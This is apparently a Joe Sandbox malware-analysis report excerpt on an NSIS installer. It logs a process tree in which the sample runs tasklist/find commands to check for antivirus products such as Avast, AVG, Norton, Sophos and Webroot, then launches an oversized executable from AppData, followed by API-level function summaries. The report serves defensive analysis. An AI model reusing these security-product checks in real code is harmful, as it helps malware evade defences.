Target ID:	22
Start time:	14:25:54
Start date:	27/12/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	"timeout" 9
Imagebase:	0x7ff742280000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:25:54
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Imagebase:	0x7ff60ed00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:	0x7ff7b58f0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "wrsa.exe"
Imagebase:	0x7ff657470000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Imagebase:	0x7ff60ed00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:	0x7ff7b58f0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "opssvc.exe"
Imagebase:	0x7ff657470000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Imagebase:	0x7ff60ed00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:	0x7ff7b58f0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:26:03
Start date:	27/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avastui.exe"
Imagebase:	0x7ff657470000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Imagebase:	0x7ff60ed00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:	0x7ff7b58f0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avgui.exe"
Imagebase:	0x7ff657470000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Imagebase:	0x7ff60ed00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:	0x7ff7b58f0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "nswscsvc.exe"
Imagebase:	0x7ff657470000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Imagebase:	0x7ff60ed00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Imagebase:	0x7ff7b58f0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	14:26:04
Start date:	27/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "sophoshealth.exe"
Imagebase:	0x7ff657470000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	14:26:09
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe"
Imagebase:
File size:	1'063'239'551 bytes
MD5 hash:	C12ED31F29EF510393AE36661F44F102
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	24

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D79,759223A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

~nsu.tmp, xrefs: 00403B23
/D=, xrefs: 004039D2
NSIS Error, xrefs: 0040390E
\Temp, xrefs: 00403A47
SeShutdownPrivilege, xrefs: 00403C42
NCRC, xrefs: 004039A8
Error launching installer, xrefs: 00403AA9
_?=, xrefs: 00403A90

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

detailprint: %s, xrefs: 00401679
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename on reboot: %s, xrefs: 00401943
BringToFront, xrefs: 004016BD
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: "%s" (%d), xrefs: 004017BF
CreateDirectory: "%s" created, xrefs: 00401849
Call: %d, xrefs: 0040165A
Sleep(%d), xrefs: 0040169D
SetFileAttributes failed., xrefs: 004017A1
Rename: %s, xrefs: 004018F8
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Jump: %d, xrefs: 00401602
Rename failed: %s, xrefs: 0040194B
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Aborting: "%s", xrefs: 0040161D

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
